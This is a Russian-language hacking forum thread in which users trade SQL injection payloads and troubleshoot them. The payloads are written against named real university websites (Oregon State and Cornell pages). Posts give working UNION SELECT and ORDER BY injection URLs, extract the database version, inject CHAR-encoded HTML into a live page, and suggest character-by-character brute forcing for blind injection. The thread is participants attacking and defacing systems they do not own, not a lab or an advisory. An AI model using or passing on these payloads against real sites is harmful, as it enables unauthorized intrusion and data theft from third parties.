Ваши вопросы по уязвимостям.

Ребят, прошу помощи.Через order by подобрал поля. Пытаюсь вывести через
index.php?ID=-19+UNION+SELECT+1,2,3/* -т.е. при неверном id, редиректит на др. страницу another.html
При запросе ID=19+UNION+SELECT+1,2,3/* не выводит ошибок, но и выводимых полей нет, id то верный.
Как можно обойти?
И вообще не первый раз встречаюсь с ситуацией,id=1593+order+by+12/* ошибка,id=1593+order+by+8/* нет ошибки,id=-1593+order+by+8/* редирект.Why?

 

пробуй
ID=-1+UNION+SELECT+1,2,3/*
или
ID=19+and+1=0+UNION+SELECT+1,2,3/*

 

2 AFoST
К сожалению не прокатило. Но все равно спасибо за совет.

 

Imperou$
давай ссылку, и будет гораздо проще

 

jokester, именно
Imperou$, давай ссылку-будем вдуплять

 

спасибо, пробовал весь английский алфавит в запросе, не нашел юзера у аого чтобы был сериал намбер

 

1SeTh, я тоже ищу-пока безрезультатно. видать программулину мало кто покупает

 

http://cropandsoil.oregonstate.edu/people/faculty.php?ID=19+order+by+3/*
вот ссыль, это одна из целой кучи, где я с такой хней встречался.

 

http://img225.imageshack.us/img225/9384/raosujayalj2.jpg
Всё из-за этого.

 

Я не сомневался
а если серьёзно? Я просто не понял стёба.

 

Imperou$
Обычная слепая скуль(я во всяком случае вывода не добился), подзапросы, или другой параметр, я не смотрел

 

http://kmoddl.library.cornell.edu/resources.php?id=1593+order+by+1/*
А вот такой вариант? Ребят, вы если что нащли или показали, то обьясняйте пожалуйста. А то я не всегда догоняю о чем речь Или хотя бы ткните на статьи где это подробно рассматривается. Например с подзапросами у меня вообще лажа полная, не понимаю как они функционируют. Новичёк ещё просто, не разобрался со всем.

 

Твой параметр тоже слепая , но вот другой с выводом:
_http://kmoddl.library.cornell.edu/resources.php?t=9999999+union+select+1,UNHEX(HEX(version())),3/*
Сдесь про подзапросы:
http://forum.antichat.ru/showthread.php?t=18552

 

Огромное спасибо! Начал вьезжать, что к чему.

 

http://kmoddl.library.cornell.edu/resources.php?t=9999999+union+select+1,CHAR(60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,105,109,103,53,49,55,46,105,109,97,103,101,115,104,97,99,107,46,117,115,47,105,109,103,53,49,55,47,53,57,50,50,47,114,97,111,115,117,106,97,121,97,106,115,54,46,106,112,103,62,60,47,105,109,103,62),3/*

 

Ты про что именно ?

 

И снова здраствуйте

Почему возникает ошибка при попытке вывода колонок методом union+select вида:

The used SELECT statements have a different number of columns

если через order+by поля подобрал верно?

 

Возможно эти значения используются в нескольких запросах. В одном из запросов колонок больше/меньше чем ты указал, а второй запрос выполнился правильно, но вывода результатов на страницу нет.

 

Как всегда тебе спасибо за чёткость и оперативность Курю мануалы, накачал статей, но не нашёл по сабжу
Обойти возможно?

 

посимвольный брут